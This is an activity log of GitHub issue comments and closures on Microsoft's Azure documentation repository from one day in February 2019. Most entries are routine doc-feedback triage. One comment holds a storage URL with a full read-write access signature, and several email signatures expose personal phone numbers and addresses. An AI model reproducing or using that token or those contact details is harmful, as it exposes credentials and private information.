Here is output for the containers running per docker.

CONTAINER ID        IMAGE

[2019-02-21 18:23] Grace-MacJones-MSFT commented on #25466
Hi @WillAutioItrax, thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 18:23] Karishma-Tiwari-MSFT commented on #25385
Thanks @v-piwijs.

[2019-02-21 18:26] MicahMcKittrick-MSFT commented on #25409
I am assigning to the content author to review and provide additional information.

@jonbeck7 can you take a look?

[2019-02-21 18:26] MicahMcKittrick-MSFT commented on #25126
I am assigning to the content author to review and provide additional information.

@jonbeck7 can you take a look?

[2019-02-21 18:27] MicahMcKittrick-MSFT commented on #25125
I am assigning to the content author to review and provide additional information.

@jonbeck7 can you take a look?

[2019-02-21 18:29] cephalin commented on #20593
@JohnGalt1717 Thanks for your feedback. I've added the requested guidance in the doc now and the update should be published in the next day.
 #please-close

[2019-02-21 18:30] conceptdev commented on #25466
@WillAutioItrax it's likely the information is out of date. For push notifications with Xamarin.Forms I would recommend trying out App Center

https://docs.microsoft.com/appcenter/sdk/push/xamarin-forms

There is also some [UWP-specific info](https://docs.microsoft.com/appcenter/sdk/push/uwp) that might be relevant to the issues you experienced.

[2019-02-21 18:32] normesta commented on #25332
Thanks @AlexanderTodorovic. We've been hearing about similar issues. When you have a storage account and then assign the Storage Blob Data Contributor role to the parent subscription or resource group, the role assignments don't immediately propagate down to the storage account. Until that happens, you'll receive errors. I've updated both our quickstart and related tutorials to call that out. The

[2019-02-21 18:33] MicahMcKittrick-MSFT commented on #24765
FYI, I am assigning to the content authors to review further as we have all had the same errors following the documentation.

@TylerMSFT @aljo-microsoft can either of you look further into this?

[2019-02-21 18:34] JohnGalt1717 commented on #20593
Thanks!

[2019-02-21 18:34] #20593 closed

[2019-02-21 18:35] Anand-Moghe commented on #24581
@cephalin  Thank you.

[2019-02-21 18:35] #24581 closed

[2019-02-21 18:36] YutongTie-MSFT commented on #25220
@KeiroKamioka0000 This is a duplicate issue of #25219 , I will close this for now. Please keep eyes on #25219 Thank you.

[2019-02-21 18:36] #25220 closed

[2019-02-21 18:37] #25142 closed

[2019-02-21 18:38] YutongTie-MSFT commented on #25353
@aashishb Hi, do we have any plan for gcc support? Thanks.

[2019-02-21 18:40] Alberto-Vega-MSFT commented on #25272
@smithGit No worries I'm glad you figured it out and thanks for the feedback! Can you post this as a feedback @ https://feedback.azure.com/forums/911455-azure-iot-central This will allow the community to upvote and for the product team to include into their plans.
We also have the "Give Product Feedback" button in our documents now to take you directly to the appropriate feedback page.

[2019-02-21 18:41] MicahMcKittrick-MSFT commented on #25459
@Netdoc41 you are able to enable Autoscaler on an existing cluster. We mention the steps in this doc

https://docs.microsoft.com/en-us/azure/aks/cluster-autoscaler#enable-the-cluster-autoscaler-on-an-existing-aks-cluster

The error you are seeing seems to be because your AKS cluster you already have is not setup running VMSS (Scale Sets) and is likely using standalone nodes. You can check this by

[2019-02-21 18:45] #25190 closed

[2019-02-21 18:49] YutongTie-MSFT commented on #25292
@rueylinlee Are you solving your problem offline?

[2019-02-21 18:49] Alberto-Vega-MSFT commented on #25456
@eifinger Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 18:50] rueylinlee commented on #25292
What does offline mean here?  We are in office network and trying to access customvision.ai.

Thanks and Regards,
Ruey-Lin Irene Lee
R. Irene Lee
DSS/ADM, Technology Organization
[cid:image001.png@01D2FD9D.4081D8F0]<https://dss.southernco.com/>
Cell: 678-770-6042
Rilee@southernco.com<mailto:Rilee@southernco.com>
[cid:image005.png@01D31021.B59B10C0]<https://tiny.sc/dssrequestservices>[cid:image006.

[2019-02-21 18:53] phil0007 commented on #25390
Hello,
As with the other issue I logged it's not a doc issue, it seems more a query language issue.

The file and blob url are available there if it's ok:

**#25316**

[2019-02-21 18:57] rolyon commented on #24963
Hi @daweins
I've updated the custom role docs to include ResourceHealth for Virtual Machine Operator.
https://docs.microsoft.com/en-us/azure/role-based-access-control/custom-roles-powershell
https://docs.microsoft.com/en-us/azure/role-based-access-control/custom-roles-cli
Let me know if you have any additional feedback.
thanks

[2019-02-21 18:58] rolyon commented on #24963
@MicrosoftDocs/azure-cxp-triage
please-close

[2019-02-21 18:59] #24963 closed

[2019-02-21 19:01] Netdoc41 commented on #25459
Indeed they are standalone. at the time of their creation i did not know about this option. I assume there is no way to magically convert, thus the new autoscale feature will only work on clusters that were created with that option for VMSS originally?

[2019-02-21 19:04] JobenNC opened #25476 "Custom Parameters File and Pipeline Activities"
I would love to see an example where the custom parameters file is parameterizing something inside of a pipeline activity. I can't seem to make this work.

I also found this section a bit confusing:
"When you specify array in the definition file, you indicate that the matching property in the template is an array. Data Factory iterates through all the objects in the array using the definition spec

[2019-02-21 19:04] chetansriv commented on #25184
@jeevansd Updating the tutorial

[2019-02-21 19:04] brlewi commented on #25231
test

[2019-02-21 19:05] MicahMcKittrick-MSFT commented on #25459
Correct and Correct. No way to migrate at this time. We do state it only works on VMSS but it can be easily looked over as this doc is decently in length

![image](https://user-images.githubusercontent.com/32313503/53194521-6540fd00-35c8-11e9-9a70-9a31dff22933.png)

The feature itself is still in preview so we wouldn't suggest using it in a production environment regardless. So for the purposes of

[2019-02-21 19:05] SaurabhSharma-MSFT commented on #25256
@Nilis312 AFAIK It’s not dependent on client OS/ browser and as long as the browser supports primary authentication – MFA will work.

[2019-02-21 19:06] mimig1 commented on #21061
@philmea - Should this still be assigned to you? If not, please email the CXP team/tag the original CXP person and have them reassign.

[2019-02-21 19:08] TravisCragg-MSFT commented on #24221
@jjindrich I was able to use DNS Zones without issue on Ubuntu 18.04.1 LTS.

`trav@TravDNSLinux:~$ host travZ1Test`
`travZ1Test.vhgkgkt3ifsutdprig2tuy4bja.gx.internal.cloudapp.net has address 10.1.0.4`

My resolv.conf:

options edns0
search vhgkgkt3ifsutdprig2tuy4bja.gx.internal.cloudapp.net

How exactly are you trying to resolve the names?

[2019-02-21 19:08] Mike-Ubezzi-MSFT commented on #25452
@jiroseng In looking through the information, a network mask bit of /28 (14 hosts per network) will work for a single general purpose or business-critical deployment. A mask bit of /27 (30 hosts per network) is ideal for a multiple Managed Instance deployment within the same VNet. Mask bit settings of /26 (62 hosts) and /24 (254 hosts) will further allow scaling out the VNet to support additional

[2019-02-21 19:11] SaurabhSharma-MSFT commented on #25470
@wurst0815 Apologies if you are having trouble with the documentation.  I have assigned this issue to content author to investigate and update the document as appropriate.

[2019-02-21 19:12] SaurabhSharma-MSFT commented on #25468
@smakarsky Thanks for your feedback! We will investigate and update as appropriate.

[2019-02-21 19:14] SaurabhSharma-MSFT commented on #25462
@steverlabs Thanks for the feedback !  I have assigned this issue to content author to investigate and update the document as appropriate.

[2019-02-21 19:15] SaurabhSharma-MSFT commented on #25445
@iam4567 Thanks for your feedback! We will investigate and update as appropriate.

[2019-02-21 19:15] brlewi commented on #25231
![alt text](https://wtv3.blob.core.windows.net/media/screenshot (73).png?sv=2018-03-28&sr=b&sig=PRYAFknSa8VRG0EGFiVX3VzWyfKgAYgra1VSf4486rI%3D&st=2019-02-21T19%3A09%3A48Z&se=2022-02-21T19%3A14%3A48Z&sp=rw "screenshot (73).PNG")

[2019-02-21 19:15] SaurabhSharma-MSFT commented on #25444
@mganeshphani Thanks for your feedback! We will investigate and update as appropriate.

[2019-02-21 19:18] TravisCragg-MSFT commented on #24972
@hajjat IPs are preserved until the NIC is deleted, even without setting the internal IP to "Static" The article stating otherwise was written before that change, and could use an update!

Thanks for the feedback! I have assigned the issue to the content author to evaluate and update as appropriate.

[2019-02-21 19:30] nzmdgnc commented on #25360
I did not consider Time Zone. Should I? But even if Time Zone is considered, isn't it strange that it executes at x:19 instead of x:00? Is run ID the identifier in the run history?

[2019-02-21 19:34] ravikiran-srini commented on #24645
any insights please?

[2019-02-21 19:38] itanex commented on #18494
I don't see how the changes made address my concerns. Could you please clarify.

[2019-02-21 19:45] ctahok opened #25477 "Two letters of region"
Sugest to change "geo-name refers to the region where the recovery service vault resides" to ""geo-name refers to the two letters of the region where the recovery service vault resides; for example North Europe URL would be https://pod01-rec2.ne.backup.windowsazure.com"

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 14

[2019-02-21 19:49] dlepow commented on #25350
@iricigor - The additional details are very helpful. You're right: the Marketplace UI presents somewhat different publisher and other details than the Azure compute APIs for specifying images - for example, when using PowerShell/CLI or through the "Select an image" blade when creating a VM.

@jakaruna-MSFT, can you please raise this difference as a possible product issue with the Marketplace or po

[2019-02-21 19:53] brlewi commented on #25275
Test

[2019-02-21 19:53] tfitzmac commented on #25446
@mcurko - thanks for this feedback. I am in the process of removing the recently added text about installing the Az module and adding a note that the script in the project does not work with the Az module.

[2019-02-21 19:55] brlewi commented on #25275
Test

[2019-02-21 19:57] mganeshphani commented on #25398
Thankyou @BryanTrach-MSFT any update on this?

[2019-02-21 19:57] brlewi commented on #25071
Test

[2019-02-21 20:03] RickyRoeslerMS opened #25478 "Missing line break in "Get Access Token" section"
In the URL sample of the "Get Access Token" section there is a missing line break in the line:
`&scope=https%3A%2F%2Fgraph.microsoft.com%2Fuser.read&response_mode=fragment`

It should read:
`&scope=https%3A%2F%2Fgraph.microsoft.com%2Fuser.read
&response_mode=fragment`

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: be08

[2019-02-21 20:14] Karishma-Tiwari-MSFT commented on #24191
Thanks @Sudharma @richyla for sharing the details. Since the same issue is open here #23789, I will close this issue. Further updates on this issue will be shared here: #23789

[2019-02-21 20:14] #24191 closed

[2019-02-21 20:15] Karishma-Tiwari-MSFT commented on #25241
Thanks for bringing this to our attention. We will now close this issue. If there are further questions regarding this matter, please tag me in a comment. I will reopen it and we will gladly continue the discussion.

[2019-02-21 20:15] #25241 closed

[2019-02-21 20:17] asoet opened #25479 "Typo"
&lt;Item Key=" XmlSignatureAlgorithm"&gt;Sha256&lt;/Item&gt;

There is a space before XmlSignatureAlgorithm

&lt;Item Key="XmlSignatureAlgorithm"&gt;Sha256&lt;/Item&gt;

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: e14a5d4c-5125-8ed2-7fda-38aee1296b76
* Version Independent ID: 054d298b-937e-9f01-ae56-7025e47e4eec
* Co

[2019-02-21 20:22] #25446 closed

[2019-02-21 20:24] femsulu commented on #25446
adding triage labels and closing as resolved.

[2019-02-21 20:26] femsulu commented on #25454
@Charmendar Thanks for the Comment. We are actively investigating and will get back to you soon.

[2019-02-21 20:27] YutongTie-MSFT commented on #25474
@lnr0626
Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 20:27] DMoonesinghe opened #25480 "This article doesn't define key terms that are used."
This article uses the following terms.  But as to what those means not clearly defined here or anywhere else.
Therefore it is hard to glean a precise meaning of these terms by simply reading this or any article.
Terms:
            **Registration Virtual Network**
                          - You can get somewhat of an idea by reading the article. . But could be defined before

[2019-02-21 20:28] mike-urnun-msft commented on #25461
Hi @romankiss Thank you for your feedback! We will review and update as appropriate.

[2019-02-21 20:29] rizwaans commented on #25418
@KetanChawda-MSFT  Thanks very much, This worked for me.

I have another query regarding LogicApp Outputs. I know this is not the right thread but can you please help me with this too.

I'm looking to use the outputs value in email body

"outputs": {
  "<key-name>": {
    "type": "<key-type>",
    "value": "<key-value>"
  }
}

in my email below
"Send_an_email_ETA_Approved": {

[2019-02-21 20:29] mike-urnun-msft commented on #25457
Hi @EddyP23 Thank you for your feedback! We will review and update as appropriate.

[2019-02-21 20:31] mike-urnun-msft commented on #25447
Hi @KoenVerbeeck Thank you for your feedback! We will review and update as appropriate.

[2019-02-21 20:36] avfc1982 opened #25481 "How to cancel a Pipeline when in debug"
Where can you cancel a PipeLine if it is still running in Debug mode? I have a PipeLine that is still running but I do not have the ability to cancel this.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 5abe92e0-af6a-4def-ca04-cec316529945
* Version Independent ID: 96e2ab4c-46cd-e996-fb11-1423b2325928
* Content: [Itera

[2019-02-21 20:44] hajjat commented on #24972
GREAT! That's what I thought. Thanks much!

[2019-02-21 20:45] diberry commented on #25471
Issue of assigning multiple containers on same host to different exposed ports needs to be doc'd.

#please-close

[2019-02-21 20:45] femsulu commented on #25467
@sjkp Thanks for the candid feedback. This will be reviewed internally to determine if an update to the feature + documentation is required. We will now close this thread but please reply if you have any additional questions.

@dhirajgandhi  - FYI

[2019-02-21 20:45] PatAltimore commented on #25387
#please-close

[2019-02-21 20:46] #25471 closed

[2019-02-21 20:46] #25467 closed

[2019-02-21 20:53] femsulu commented on #25450
@SychevIgor sorry for the frustration. Adding @tfitzmac for input on potential clarification on the documentation/template

[2019-02-21 20:54] JasonWHowell commented on #25007
@bryanklewis I don't have any extra detail yet. Did that bit I offered unblock you?

We'll explain more in the docs in our next revision, but it might be a few weeks.

[2019-02-21 20:55] mike-urnun-msft commented on #25064
Hi @MouthOfMadness

Runtime doesn't appear to be a required setting so the samples would still work: https://docs.microsoft.com/en-us/azure/templates/Microsoft.Web/2018-02-01/sites#siteproperties-objec

We will now proceed to close this thread. If there are further questions regarding this matter, please reopen it and we will gladly continue the discussion.

[2019-02-21 20:55] #25064 closed

[2019-02-21 20:56] way2arun commented on #25077
@rthorn - thanks for the update, am currently looking for AZ CLI commands - custom roles creation for Management group Scope,
I don't see the the az role definition create for Management group scope, (am using az cli version 2.0.58)
I believe az role definition currently supports subscription scope

[2019-02-21 21:04] tulasim88 commented on #25453
@ahalha thanks for the feedback. the Azure search tier limits are no longer limiting the number of Question and Answer pairs (depending on your region). The limits you should think about are size based limits.
A Q&A pair maps to a document on Azure Search index. to see more you can refer to "number of documents" section:  https://docs.microsoft.com/en-us/azure/search/search-limits-quotas-capacity#

[2019-02-21 21:15] MarileeTurscak-MSFT commented on #25398
By default, everything in PowerBI starts in your own personal workspace. Anything you do there is only owned by you. If you want to collaborate and share content creation and have multiple "owners" then you need to create a Group Workspace (Pro License required). You can connect to the Content Pack from the Group workspace - [described here](https://powerbi.microsoft.com/en-us/guided-learning/powe

[2019-02-21 21:16] MarileeTurscak-MSFT commented on #25398
We will now proceed to close this thread. If you have further questions feel free to reach out in the PowerBI community forum. https://community.powerbi.com

[2019-02-21 21:16] #25398 closed

[2019-02-21 21:17] spzitello opened #25484 "Help with authorization"
I don't know if this is the right forum.  I need a little help getting started.  I can get tokens with client credential grant types, but still not get to ../Patient resource. (403 Forbidden).  Perhaps I need to use authorization_code, but cant because Postman only shows blank screen, never a login.  My intent is connect through jvm based client eventually, but cant get past go.  If there is some

[2019-02-21 21:17] MouthOfMadness commented on #25064
This was a great article, but I couldn't get it to run without the runtime configured when deployed through devops.  I was able to figure this out by creating a function app through the portal and then going into Kudo and doing a file compare to see what was missing.

[2019-02-21 21:18] Mike-Ubezzi-MSFT commented on #18494
@itanex The following section appears to be updated: [Set up server-level auditing for all databases](https://docs.microsoft.com/en-us/azure/sql-data-warehouse/sql-data-warehouse-auditing-overview#subheading-5) with the following:

![screenshot 279](https://user-images.githubusercontent.com/37126106/53202341-118bdf00-35db-11e9-876e-be2c40c09c53.png)

[2019-02-21 21:22] inesk-vt commented on #24583
Thank you, that’s perfect and the pre-requisite section now clearly calls that out upfront. Thank you for updating!

Sent from Mail<https://go.microsoft.com/fwlink/?LinkId=550986> for Windows 10

________________________________
From: Kelly Gremban <notifications@github.com>
Sent: Wednesday, February 20, 2019 1:01:44 PM
To: MicrosoftDocs/azure-docs
Cc: Ines Khelifi; Mention
Subject: Re: [Microsoft

[2019-02-21 21:27] mihammer opened #25485 "Possible Document issue"
I walked through this step by step through the point of creating a VM from an image.
To me, the following was unclear and the script did not work. Possibly I did something wrong, but I think the script is wrong.

# The following should set the source image as myImage1 from the table above
$vmConfig = Set-AzVMSourceImage `
   -VM $vmConfig `
   -PublisherName myPublisher `
   -Offer myOffer `
   -S

[2019-02-21 21:30] Mike-Ubezzi-MSFT commented on #25476
@JobenNC Thank you for the detailed feedback. I have assigned this to the content owner as an enhancement. With this type of feedback, we hope to make the docs both more accurate and with greater clarity.

[2019-02-21 21:36] dlepow commented on #25271
I published a documentation update to mention this case. Thanks again @doug-fish for pointing it out. Please note that more fine-grained ACR roles may be added in the future, and we'll continue to update the article with the latest information.
#please-close

[2019-02-21 21:37] #25271 closed

[2019-02-21 21:39] anrothMSFT commented on #25292
I think it was meant metaphorically- ie not on this thread

Unfortunately, the screenshot didn’t make it though to this thread.

The easiest thing to do may be to reach out to Azure support.  Alternatively, you could ping the Cognitive Services support ticket generator: tickets@cognitive.uservoice.com

From: rueylinlee <notifications@github.com>
Sent: Thursday, February 21, 2019 10:51 AM
To: Micro

[2019-02-21 21:44] rueylinlee commented on #25292
How about if I use an attachment?

Thanks and Regards,
Ruey-Lin Irene Lee
R. Irene Lee
DSS/ADM, Technology Organization
[cid:image001.png@01D2FD9D.4081D8F0]<https://dss.southernco.com/>
Cell: 678-770-6042
Rilee@southernco.com<mailto:Rilee@southernco.com>
[cid:image005.png@01D31021.B59B10C0]<https://tiny.sc/dssrequestservices>[cid:image006.png@01D31021.B59B10C0]<http://tiny.sc/dssyammer>[cid:image0

[2019-02-21 21:44] DMoonesinghe commented on #25480
Actually I found my own answer: But it should be clearly worded.  Here is my suggestion.

Azure Private DNS introduces 2 new concepts to DNS.
	1. Registration Virtual Network. - VNet with private DNS zone name, that is resolved by Azure (Internal) DNS.
		○  VMs added to this are automatically registered with its name as an A record.
		○ VMs resolved by Azure (internal) DNS for any queries coming f

[2019-02-21 21:46] explorer2015 opened #25487 "APIs to add Certificate"
1. Is there  an API to do steps 4-b-ii and 4-b-iii  programmatically?
2. Also why is this step needed given that we are/could providing the same certificate during group enrollment? Verification could be an added step during enrollment?

4, b, ii
Under the Add Certificate, enter the following information:
    Enter a unique certificate name.
    Select the RootCA.pem file you just created.
    Onc

[2019-02-21 21:48] agentKnipe opened #25488 "socialIdpUserId has been renamed in the FrameworkBase file"
In the TrustFrameworkBase.xml file there is a comment that the socialIdpUserId claim has been renamed to issuerUserId.  However, in the claims provider on this page, you still have the claim listed as socialIdpUserId .  This field should be updated to reflect the new claim id.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

*

[2019-02-21 21:49] Mike-Ubezzi-MSFT commented on #25476
@CHEEKATLAPRADEEP-MSFT It looks like this may need to be assigned to @craigg-msft as the currently assigned content owner has moved on.

[2019-02-21 21:55] umerjaved opened #25489 "Azure data factory -The Integration run time has encountered an error during Registration"
My customer is facing issue when registering self hosted integration runtime on a machine behind corporate firewall. They are getting following error. Any idea how this can be fixed?

"
The integration runtime node failed to connect to cloud service due to network connectivity issue.
failed to connect to we.frontend.cloudatahub.net
"
![image](https://user-images.githubusercontent.com/16427070/5320

[2019-02-21 21:58] Mike-Ubezzi-MSFT commented on #25481
@avfc1982 Thank you for this detailed inquiry. There is a PowerShell option, depending on the Data Factory Version: [Stop-AzureRmDataFactoryV2PipelineRun](https://docs.microsoft.com/en-us/powershell/module/azurerm.datafactoryv2/stop-azurermdatafactoryv2pipelinerun?view=azurermps-6.13.0) for ADFv2.

[2019-02-21 21:58] bbartling opened #25490 "Machine learning model output to excel spreadsheet"
I have a regression machine learning application, is it possible to build a deep learning model with the Azure stack and then deploy/download the model as an excel spreadsheet?

I think I can remember seeing something about this but not sure where or how to start.

I have an application where I can create a model of my customers data from CSV file but they are only Excel users. So I am hoping it w

[2019-02-21 21:59] BryanTrach-MSFT commented on #25440
@sarahzerry Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 22:01] MartinJaffer-MSFT commented on #25447
Sounds like a (hidden) feature to me.  I can imagine uses for it.

[2019-02-21 22:05] angellmethod opened #25491 "IoT Hub trigger is missing in supported binding table"
Even though the trigger is named, in the portal, IoT Hub (Event Hub), it seems like it would be helpful to list it separately from Event Hubs in the table above for people who aren't familiar with the relationship between the two services.

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: 7d575e82-637b-32de-e64d-75adf4b6d

[2019-02-21 22:07] theangellmethod commented on #25491
This should also be added in the How-to guides -> Develop -> Developer Guide table.

[2019-02-21 22:08] andresferreira opened #25492 "Not correctly edited"
Can you please review this line in Step 3: Connect to an Azure Cosmos DB account:

"csharp using System; using System.Threading.Tasks; using System.Configuration; using Microsoft.Azure.Cosmos; using System.Collections.Generic; using System.Net;"

It does not look correctly edited

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

[2019-02-21 22:09] bhanu7755 commented on #25403
@YASWANTHM-MSFT Sure.. I'll give it a try.

[2019-02-21 22:15] femsulu commented on #25477
@ctahok Thanks for bringing this to our attention. Your feedback has been shared with the content owner for further review.

[2019-02-21 22:18] tfitzmac commented on #25450
@SychevIgor - thanks for this feedback, and sorry about the lack of clarity. I have updated the reference articles to provide a description of the different values you might use for name and type. I am in the process of updated the conceptual article to describe this difference.

[2019-02-21 22:18] hansenms commented on #25484
We will need a bit more information to help you out, but here are some things to check:

Take your token to https://jwt.ms and inspect the claims. The claims to validate are that the `aud` is set to `https://azurehealthcareapis.com` and check that `oid` is in the list of allowed object ids that you can find on the "Authentication" blade in the portal.

I am also a bit confused about you trying to

[2019-02-21 22:19] TravisCragg-MSFT commented on #25480
@DMoonesinghe Thanks for the feedback! I have assigned the issue to the content author to evaluate and update as appropriate.

[2019-02-21 22:25] kagarmoe commented on #24474
It looks like it is related to: https://github.com/chef/knife-azure/issues/490

[2019-02-21 22:26] MarileeTurscak-MSFT commented on #25386
Only the alternate email field can be edited at this time via Azure AD Graph API.

You can leave a feature request for this here. https://feedback.azure.com/forums/169401-azure-active-directory

[2019-02-21 22:27] MarileeTurscak-MSFT commented on #25386
We will now proceed to close this thread. If you have further questions feel free to reach out on MSDN and I will gladly continue the discussion. https://social.msdn.microsoft.com/Forums/en-US/home?forum=WindowsAzureAD

[2019-02-21 22:27] #25386 closed

[2019-02-21 22:30] MarileeTurscak-MSFT commented on #25410
@alexdlevin Can you please post a screenshot of where this is happening?

[2019-02-21 22:33] MarileeTurscak-MSFT commented on #25383
A differential query is an enterprise feature rather than a B2C one. This is why it isn't available in an Azure AD B2C tenant.

Alternatively, you can access [the audit logs in the Azure AD B2C tenant](https://docs.microsoft.com/en-us/azure/active-directory-b2c/active-directory-b2c-reference-audit-logs) for the CRUD operations on users, using [the Azure AD Reporting API](https://docs.microsoft.com

[2019-02-21 22:34] MarileeTurscak-MSFT commented on #25383
We will now proceed to close this thread. If you have further questions feel free to reach out to me on MSDN and I will gladly continue the discussion. https://social.msdn.microsoft.com/Forums/en-US/home?forum=WindowsAzureAD

[2019-02-21 22:34] #25383 closed

[2019-02-21 22:36] Karishma-Tiwari-MSFT commented on #25239
@shrivara Please take a look at [Resolve errors for resource provider registration](https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-manager-register-provider-errors) doc for this error.
This error can occur if your resource provider is not registered. Try the solutions provided in the doc and let me know if you still see issues. Thanks.

[2019-02-21 22:37] spzitello commented on #25484
Nice of you to respond.  I am thankful.

Query: GET https://zitellodbs.azurehealthcareapis.com/Patient
For this I have only used the client_credentials grant type , which seems that like it explains failure to authenticate.  With jwt.ms, I do not see any roles.
I don’t really know which “object”the OID is referring to.
I did add that the Allowed object IDs for the “Azure API for FHIR”, but I do no

[2019-02-21 22:39] dlepow commented on #25060
@adinunzio84 @Karishma-Tiwari-MSFT - Thanks also for the feedback. I think this difference could be due to the way `az acr repository show-manifests` returns data in different CLI versions. I don't see different behavior by shell in my environment with a recent version of the CLI (v. 2.0.58). So, this command shows untagged image in the output with an empty `tags` array:

[code]
And the JMESPath q

[2019-02-21 22:55] taromielnaz opened #25493 "outdated"
is this instruction written based on old portal? I dont see this environment .

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: fc53b5d7-d126-807b-fabf-418d17da0d30
* Version Independent ID: 93272de6-13a3-4505-f266-2dde8bd06cfa
* Content: [Create a web app in an App Service Environment v1 - Azure](https://docs.microsoft.

[2019-02-21 22:58] fhryo-msft commented on #13195
Unfortunately, it's not supported.

[2019-02-21 23:01] daweins commented on #24963
Thanks!
-Dave-

David Weinstein | Principal Program Manager, Azure Customer Advisory Team (CAT) | 720-878-8132 | daweins@Microsoft.com<mailto:daweins@microsoft.com>

From: Robert Lyon <notifications@github.com>
Sent: Thursday, February 21, 2019 10:58 AM
To: MicrosoftDocs/azure-docs <azure-docs@noreply.github.com>
Cc: David Weinstein (AZURECAT) <daweins@microsoft.com>; Mention <mention@noreply.gith

[2019-02-21 23:14] shrivara commented on #25239
The document seems to be specific to fixing template errors when the resource isn't registered and/or is using an incorrect API version. In my case the resource _is_ registered and I'm using the AZ CLI, so there are no templates involved.

Here are the error lines that I see when I use the AZ CLI command with the `--debug` flag.

[code]

As you can see, AZ CLI attempts to use the version `2018-01-

[2019-02-21 23:15] Leon99 opened #25494 "Namespace "Guest (Classic)" doesn't appear after enabling guest-level monitoring"
How can I see the Perf. Counters in Azure Portal?

---
#### Document Details

⚠ *Do not edit this section. It is required for docs.microsoft.com ➟ GitHub issue linking.*

* ID: c25393b0-948f-414a-4699-db82f9b3eb68
* Version Independent ID: cbb32016-2d50-504d-a862-395a93325511
* Content: [Add extended metrics for Azure virtual machines](https://docs.microsoft.com/en-us/azure/cost-management/azure-v

[2019-02-21 23:17] MicahMcKittrick-MSFT commented on #25485
Thanks for the feedback! We are currently investigating and will update you shortly.

[2019-02-21 23:19] ththiem opened #25495 "Conflicting information with other pages, clarity on recommended practice?"
It is a bit unclear what is necessary, and recommended, for diagnostics and monitoring solutions for service fabric. The information here seems at odds with other pages.

For example, this page states that you only need to create the app insights resource in azure and then add the fabric native nuget package to your services and it gives full comprehensive telemetry out of the box, organized and s

[2019-02-21 23:22] #12387 closed

[2019-02-21 23:22] #14049 closed

[2019-02-21 23:22] #14057 closed

[2019-02-21 23:22] #14211 closed

[2019-02-21 23:22] #14323 closed

[2019-02-21 23:23] #15518 closed

[2019-02-21 23:23] #16159 closed

[2019-02-21 23:23] #16758 closed

[2019-02-21 23:23] #25387 closed

[2019-02-21 23:26] bandersmsft commented on #25494
@Leon99 Hi I'm not sure why you're not seeing your perf counters. You can take a look at https://docs.microsoft.com/en-us/azure/virtual-machines/windows/monitor for more information.
#please-close

[2019-02-21 23:27] btm commented on #24474
This should be fixed with knife-azure 1.9.0, which was released today. This can be upgraded in Chef Workstation with `chef gem install knife-azure -v 1.9.0`.

[2019-02-21 23:27] rachel-msft commented on #20758
So far I haven't been able to reproduce the issue. I will try some more tests.

[2019-02-21 23:30] chargerback-ron commented on #17959
When I run step 4 on SQL Managed Instance, I get the following error:

Msg 3201, Level 16, State 2, Line 5
Cannot open backup device 'https://mitutorials.blob.core.windows.net/databases/WideWorldImporters-Standard.bak'. Operating system error 5(Access is denied.).
Msg 3013, Level 16, State 1, Line 5
RESTORE FILELIST is terminating abnormally.

[2019-02-21 23:36] SnehaGunda commented on #25492
@andresferreira this is a markdown formatting issue, I submitted a PR to fix it: https://github.com/MicrosoftDocs/azure-docs-pr/pull/67303

[2019-02-21 23:36] tysonn commented on #5051
Closing due to inactivity.

[2019-02-21 23:36] #5051 closed

[2019-02-21 23:36] SnehaGunda commented on #25492
#please-close

[2019-02-21 23:36] tysonn commented on #5125
Closing due to inactivity.

[2019-02-21 23:36] #5125 closed

[2019-02-21 23:37] TylerMSFT commented on #24353
@aelij, the dev team took a look at their implementation and yes, strings can serve as durable keys for reliable collections.

Use the string itself as the key--do not use the result of .GetHashCode for the key.

I'll update the warning msg. in the doc.

[2019-02-21 23:39] tysonn commented on #5256
Closing due to inactivity.

[2019-02-21 23:39] #5256 closed

[2019-02-21 23:39] Mike-Ubezzi-MSFT commented on #25492
@andresferreira Thank you for bringing this to our attention. I have made the content owner aware of this.

[2019-02-21 23:39] hansenms commented on #25484
When configuring the Azure API for FHIR, either during creation or in a subsequent step, you provide a list of identity object ids:

https://docs.microsoft.com/en-us/azure/healthcare-apis/fhir-paas-portal-quickstart#additional-settings

These are identity object ids in Azure Active Directory and can refer to either a user or a service principal.  If you use `client_credentials` flow, you are provi

[2019-02-21 23:40] Mike-Ubezzi-MSFT commented on #25492
We will now proceed to close this thread. If there are further questions regarding this matter, please comment and we will gladly continue the discussion.

[2019-02-21 23:40] #25492 closed

[2019-02-21 23:41] tysonn commented on #5286
Closing, issue was not reproduced in the EN source content.

[2019-02-21 23:41] #5286 closed

[2019-02-21 23:41] tysonn commented on #5294
Closing due to lack of activity.

[2019-02-21 23:41] #5294 closed

[2019-02-21 23:43] #5322 closed

[2019-02-21 23:43] tysonn commented on #5411
Closing due to lack of activity.

[2019-02-21 23:43] #5411 closed

[2019-02-21 23:44] dkkapur commented on #25495
@srrengar

[2019-02-21 23:45] #5447 closed

[2019-02-21 23:45] MarileeTurscak-MSFT commented on #25479
@asoet
Thanks for your feedback! We will investigate and update as appropriate.

[2019-02-21 23:46] tysonn commented on #5461
Closing due to lack of activity.

[2019-02-21 23:46] #5461 closed

[2019-02-21 23:47] MarileeTurscak-MSFT commented on #25479
Thanks, @asoet! I have created a pull request to fix this. The changes should go live in 24 hours. https://github.com/MicrosoftDocs/azure-docs-pr/pull/67307

[2019-02-21 23:47] #25479 closed

[2019-02-21 23:47] SnehaGunda commented on #25238
@stevehurcombe thanks for the suggestion, I am a little confused, are you saying :

* If userId and other details of a specific user are deleted you don't have to delete the partition key?
or
* If all userIds fields for all users are deleted, you don't have to delete the partition key explicitly?

[2019-02-21 23:48] MarileeTurscak-MSFT commented on #25478
@RickyRoeslerMS
